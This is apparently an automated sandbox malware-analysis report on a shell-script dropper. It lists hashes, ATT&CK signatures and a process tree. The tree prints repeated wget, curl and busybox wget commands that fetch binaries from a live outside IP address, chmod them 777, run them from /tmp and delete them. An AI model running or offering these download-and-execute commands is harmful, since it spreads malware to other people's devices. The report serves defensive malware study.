Analysis
-
max time kernel
69s -
max time network
71s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system -
submitted
18/10/2024, 01:59
Static task
static1
Behavioral task
behavioral1
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
-
Size
10KB
-
MD5
d08f4f01c6ec9c67ead46ab98f031a55
-
SHA1
cac804b670bc7011aff98353a06d5906917e496a
-
SHA256
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514
-
SHA512
be5c70e0361500fe82048f5f3cc74bd6019fa75dc8edd3d43bdc5cf875e01e8b9a0f7922e67c42ea1a96e8821f8997c3b73c2f019b571a3ca202dc155e6bbbc7
-
SSDEEP
192:JKto885QciICt1xQYUHgw6AtXj89F6UnrPCJpBrPCJpM21xBA885QcozXj89FWY3:JKG885QciICt1xOUnrPCJpBrPCJpM21M
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Process: chmod
PIDs: 741, 897, 969, 951, 728, 879, 933, 939, 861, 957, 885, 891, 804, 909, 825, 867, 915, 945, 921, 963, 735, 759, 873, 903, 785, 810, 855, 927
-
Executes dropped EXE 28 IoCs
-
description: File opened for reading
ioc: /proc/sys/crypto/fips_enabled
Process: curl
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh/tmp/7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh1⤵PID:698
-
/bin/rm/bin/rm bins.sh2⤵PID:702
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:708
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:720
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:727
-
-
/bin/chmodchmod 777 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c./0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:731
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:732
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:734
-
-
/bin/chmodchmod 777 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8./EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:740
-
-
/bin/chmodchmod 777 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA./4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:754
-
-
/bin/chmodchmod 777 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL./fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:763
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:765
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:781
-
-
/bin/chmodchmod 777 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD./1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:803
-
-
/bin/chmodchmod 777 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj./6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:806
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:807
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:809
-
-
/bin/chmodchmod 777 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs./AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:819
-
-
/bin/chmodchmod 777 djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003./djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:850
-
-
/bin/chmodchmod 777 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp./G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:860
-
-
/bin/chmodchmod 777 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN./Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:866
-
-
/bin/chmodchmod 777 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z./ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:872
-
-
/bin/chmodchmod 777 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h./wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:878
-
-
/bin/chmodchmod 777 FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a./FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:884
-
-
/bin/chmodchmod 777 rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP./rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:890
-
-
/bin/chmodchmod 777 rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP./rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm rcmj8X0Q1cu8b0Mbyzi0URdxMezXmIvVnP2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:896
-
-
/bin/chmodchmod 777 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h./wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:902
-
-
/bin/chmodchmod 777 FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a./FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:908
-
-
/bin/chmodchmod 777 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c./0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:914
-
-
/bin/chmodchmod 777 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8./EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:920
-
-
/bin/chmodchmod 777 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD./1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:926
-
-
/bin/chmodchmod 777 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj./6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:932
-
-
/bin/chmodchmod 777 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA./4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:938
-
-
/bin/chmodchmod 777 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL./fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:944
-
-
/bin/chmodchmod 777 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp./G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:950
-
-
/bin/chmodchmod 777 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN./Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:956
-
-
/bin/chmodchmod 777 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z./ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:962
-
-
/bin/chmodchmod 777 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs./AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:968
-
-
/bin/chmodchmod 777 djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003./djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:971
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97